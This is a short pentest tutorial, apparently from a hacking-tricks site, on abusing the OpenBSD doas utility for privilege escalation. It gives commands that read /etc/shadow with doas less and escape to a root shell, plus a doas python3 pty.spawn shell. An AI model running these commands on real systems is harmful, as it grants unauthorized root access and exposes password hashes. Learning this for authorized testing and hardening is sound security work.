Hacktricks Doas < Trusted · HACKS >
In this post, we'll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest. doas originated on OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: /etc/doas.conf

#!/bin/sh
doas /usr/bin/chown user "$1"

Exploit:
doas /usr/bin/less /etc/shadow
# inside less:
!/bin/sh

Or Python bypass:
doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")'

Many binaries allow shell escapes.